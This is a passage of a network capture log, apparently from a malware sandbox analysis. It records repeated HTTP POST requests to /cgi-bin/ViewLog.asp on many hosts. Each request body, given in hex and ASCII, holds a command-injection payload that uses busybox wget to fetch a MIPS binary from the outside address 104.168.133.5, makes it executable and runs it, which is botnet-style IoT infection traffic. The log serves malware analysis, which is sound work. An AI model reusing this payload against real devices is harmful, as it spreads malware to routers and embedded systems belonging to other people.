                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              451192.168.2.145890431.128.218.1868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.665019989 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:39.903079987 CET523INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/html; charset=utf-8
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: frame-ancestors 'none'
                                              Strict-Transport-Security: max-age=3600
                                              Content-Length: 130
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              452192.168.2.144072831.136.95.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.914376020 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.482425928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.634413004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.938308954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.546125889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.761706114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.449069023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              453192.168.2.143514894.120.28.1838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:39.971556902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              454192.168.2.143359085.198.12.1268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.014426947 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.411643028 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:43.042332888 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              455192.168.2.144173031.57.39.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.068202972 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:40.616512060 CET493INHTTP/1.1 401 Unauthorized
                                              Server: micro_httpd
                                              Cache-Control: no-cache
                                              Date: Thu, 23 Nov 2023 07:17:39 GMT
                                              WWW-Authenticate: Basic realm="X1000"
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              456192.168.2.143709694.110.182.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.165827036 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              457192.168.2.145847294.122.93.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.208170891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              458192.168.2.145746085.17.4.2358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.480732918 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.443640947 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              459192.168.2.143495085.10.31.138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.507863998 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.634402990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              460192.168.2.145946494.187.117.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.517204046 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              461192.168.2.145222485.122.218.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.841636896 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              462192.168.2.145827494.247.142.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.852720976 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              463192.168.2.143760031.136.196.828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.910701036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
